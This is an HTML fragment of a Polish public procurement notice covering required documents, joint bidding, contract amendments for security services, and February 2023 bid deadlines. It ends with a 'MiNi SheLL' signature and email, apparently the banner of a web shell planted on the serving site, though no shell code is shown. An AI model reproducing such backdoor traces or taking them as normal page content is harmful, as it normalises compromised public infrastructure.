przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od<br/>niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została<br/>najwyżej oceniona , do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków<br/>dowodowych, chyba, że Zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków<br/>dowodowychw celu potwierdzenia braku podstaw wykluczenia, tj.:<br/>1) oświadczenia (zgodnie ze wzorem stanowiącym załącznik nr 4 do SWZ) Wykonawcy<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną<br/>ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do<br/>tej samej grupy kapitałowej,<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo należy załączyć do oferty.<br/>UWAGA! Treść pełnomocnictwa powinna dokładnie określać zakres umocowania oraz dane<br/>mocodawców i pełnomocnika.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o<br/>którym mowa w art. 125 ust. 1 Pzp (oświadczenie o braku podstaw wykluczenia i spełnianiu<br/>warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ),<br/>składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, każdy z<br/>nich zobowiązany jest złożyć, na wezwanie Zamawiającego, podmiotowe środki dowodowe<br/>potwierdzające brak podstaw wykluczenia z postępowania, tj. 1) oświadczenia (zgodnie ze<br/>wzorem stanowiącym załącznik nr 4 do SWZ) Wykonawcy w zakresie art. 108 ust. 1 pkt 5<br/>ustawy Pzp, o braku przynależności do tej samej grupy<br/>kapitałowej, w rozumieniu ustawy o ochronie konkurencji i konsumentów, z innym Wykonawcą,<br/>który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od<br/>innego Wykonawcy należącego do tej samej grupy kapitałowej,<br/>2) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek<br/>udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej w zakresie<br/>doświadczenia Wykonawcy, musi spełniać w całości co<br/>najmniej jeden z tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszczalna jest zmiana umowy bez przeprowadzenia nowego postępowania o udzielenie<br/>zamówienia wyłącznie w przypadkach i na zasadach określonych w Dziale VII Rozdz. 3 ustawy<br/>Pzp.<br/>2. Zmiana postanowień umowy może nastąpić za zgodą obu Stron wyrażona na piśmie, w<br/>formie aneksu do umowy, pod rygorem nieważności takiej zmiany.<br/>3. Strony przewidują możliwość zmiany umowy w następujących sytuacjach:<br/>1) zmiany sposobu wykonania przedmiotu Umowy przez Wykonawcę,<br/>2) zmiany zakresu świadczonych usług poprzez zmianę ilości obiektów (lub ich części) objętych<br/>zamówieniem, w szczególności w przypadku zmian organizacyjnych, zakupu bądź sprzedaży<br/>obiektów,<br/>3) zmiany zakresu świadczonych usług poprzez rezygnację z ochrony jednego z obiektów (lub<br/>jego części) objętych zamówieniem i podlegającym usługom ochrony w sytuacji pojawienia się<br/>okoliczności, których nie można było przewidzieć w chwili podpisywania umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-22 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złozyc na platformie zakupowej Zamawiającego pod adresem: https://zukwejherowo.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-22 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com